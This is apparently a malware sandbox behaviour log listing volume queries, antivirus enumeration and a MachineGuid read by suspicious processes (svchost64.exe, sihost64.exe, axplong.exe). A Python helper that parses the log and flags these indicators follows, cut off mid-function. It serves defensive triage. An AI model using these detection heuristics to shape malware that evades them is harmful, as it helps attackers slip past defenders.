                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeQueries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeQueries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00C3CB1A
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C265B0 LookupAccountNameA,6_2_00C265B0
                        Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
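The behaviour lines above are only useful once they are grouped per acting process. The following Python is an added triage helper, not Joe Sandbox code: it parses the "Source: <process> <event>: <detail>" lines exactly as the text export prints them (process path and event name run together at the ".exe" boundary, "Jump to behavior" link text left on the registry line), counts events per process, and applies two of the editor's own heuristics that the findings in this report illustrate: an image running from the user's Temp folder, and an image whose name mimics a Windows binary (svchost64.exe, sihost64.exe) but does not live at C:\Windows\System32\<name>.exe. The sample lines are copied from this section; the name list in SYSTEM_STEMS is an assumption.

```python
"""Group Joe Sandbox "Source: ..." behaviour lines per process and flag the obvious ones.

Added example, not Joe Sandbox code.  The flagging rules are the editor's
heuristics; the sample lines are copied from the report section above.
"""
import re
from collections import Counter, defaultdict

# The text export fuses the process path and the event name ("...\cmd.exeWMI Queries:"),
# so the source is taken up to the first ".exe" that is followed by a known event name.
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?\.exe)"
    r"(?P<event>Queries volume information|WMI Queries|Key value queried|Code function)"
    r":\s*(?P<detail>.*?)\s*$"
)
LINK_RESIDUE = "Jump to behavior"       # hyperlink text the export leaves behind
VOLINFO_TAG = " VolumeInformation"      # trailing info-class tag on volume queries

# Windows binaries that live directly in System32 and whose names droppers reuse (assumed list).
SYSTEM_STEMS = ("svchost", "sihost", "csrss", "lsass")

# Constructed sample: lines copied from this report section.
SAMPLE = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeQueries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C265B0 LookupAccountNameA,6_2_00C265B0
Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
"""


def parse_line(line: str):
    """Return (source_process, event, detail) or None for lines that are not events."""
    m = LINE_RE.match(line)
    if not m:
        return None
    detail = m["detail"]
    if detail.endswith(LINK_RESIDUE):
        detail = detail[: -len(LINK_RESIDUE)].rstrip()
    if m["event"] == "Queries volume information" and detail.endswith(VOLINFO_TAG):
        detail = detail[: -len(VOLINFO_TAG)]
    return m["src"], m["event"], detail


def image_flags(src: str):
    """Flags derived from where the acting image lives and what it is called."""
    flags = []
    low = src.lower()
    name = low.rsplit("\\", 1)[-1]
    if "\\appdata\\local\\temp\\" in low:
        flags.append("runs from user Temp")
    stem = name[:-4] if name.endswith(".exe") else name
    for s in SYSTEM_STEMS:
        # svchost64.exe in Temp, sihost64.exe in System32\Microsoft\Libs: name squatting
        if stem.startswith(s) and low != "c:\\windows\\system32\\" + s + ".exe":
            flags.append("name squats Windows binary " + s + ".exe")
            break
    return flags


def event_flags(event: str, detail: str):
    """Flags derived from what was queried."""
    d = detail.lower()
    if event == "WMI Queries" and "securitycenter2" in d and "antivirusproduct" in d:
        return ["enumerates installed AV via root\\SecurityCenter2"]
    if event == "Key value queried" and d.endswith("machineguid"):
        return ["reads MachineGuid (host fingerprint)"]
    return []


def summarize(text: str):
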